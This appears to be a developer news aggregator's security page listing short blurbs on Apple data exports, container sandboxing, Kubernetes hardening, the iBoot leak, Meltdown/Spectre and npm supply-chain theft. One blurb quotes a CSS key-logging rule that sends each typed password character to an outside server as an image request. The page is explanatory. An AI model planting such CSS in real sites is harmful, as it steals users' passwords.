Security Icon

Security

InfoSec, DevSec, Penetration Testing, etc.
57 Stories
All Topics

Zack Whittaker zdnet.com

I asked Apple for all my data. Here's what was sent back.

Zack Whittaker writes for Zero Day: Apple gave me all the data it collected on me since I bought my first iPhone — in 2010. This is what has largely stood out to me in the ongoing discussion about what data the four have on me and how they use it… As insightful as it was, Apple’s treasure trove of my personal data is a drop in the ocean to what social networks or search giants have on me, because Apple is primarily a hardware maker and not ad-driven, like Facebook and Google, which use your data to pitch you ads. Want to request your data? It takes just a few seconds…

read more...

Google Icon Google

gVisor – a sandboxed container runtime

Why does this exist? Containers are not a sandbox. While containers have revolutionized how we develop, package, and deploy applications, running untrusted or potentially malicious code without additional isolation is not a good idea. The efficiency and performance gains from using a single, shared kernel also mean that container escape is possible with a single vulnerability. gVisor takes a distinct approach to container sandboxing and makes a different set of technical trade-offs compared to existing sandbox technologies, thus providing new tools and ideas for the container security landscape.

read more...

GitHub Icon GitHub

⚡️ Let's Encrypt strikes again, this time in your GitHub Pages

Parker Moore, on GitHub’s blog: Today, custom domains on GitHub Pages are gaining support for HTTPS as well, meaning over a million GitHub Pages sites will be served over HTTPS. What’s more: We have partnered with the certificate authority Let’s Encrypt on this project. As supporters of Let’s Encrypt’s mission to make the web more secure for everyone, we’ve officially become Silver-level sponsors of the initiative. If your custom domain uses CNAME or ALIAS records, no action is required to go HTTPS. If (like me), you have a custom domain using A records, follow along here.

read more...

Kubernetes github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!

read more...

Griffin Byatt github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he’d found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he’d be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that’s what he did and that’s what I’m doing! 💚

read more...

Security jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to ‘fix’ it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is ‘safe’. Jake shared many examples as well as ways to mitigate these types of attacks.

read more...

Security github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here’s how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a in to the password field, it will hit your server for logging. Dastardly!

read more...

iOS motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called “the biggest leak in history”, which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it’s likely the biggest leak in Apple software history. Motherboard says it… could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That’s plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn’t get updated as often as the Music app, so it’s likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all to well that once source code is made public, there’s no taking it private again.

read more...

Security rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tldr, don’t use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.

read more...

Medium Icon Medium

Meltdown and Spectre Explained

If some or most of what you’ve heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to breakdown the exploit.

read more...

Security spectreattack.com

Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱

read more...

Hackernoon Icon Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless if it’s based on a true story or not. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.

read more...
0:00 / 0:00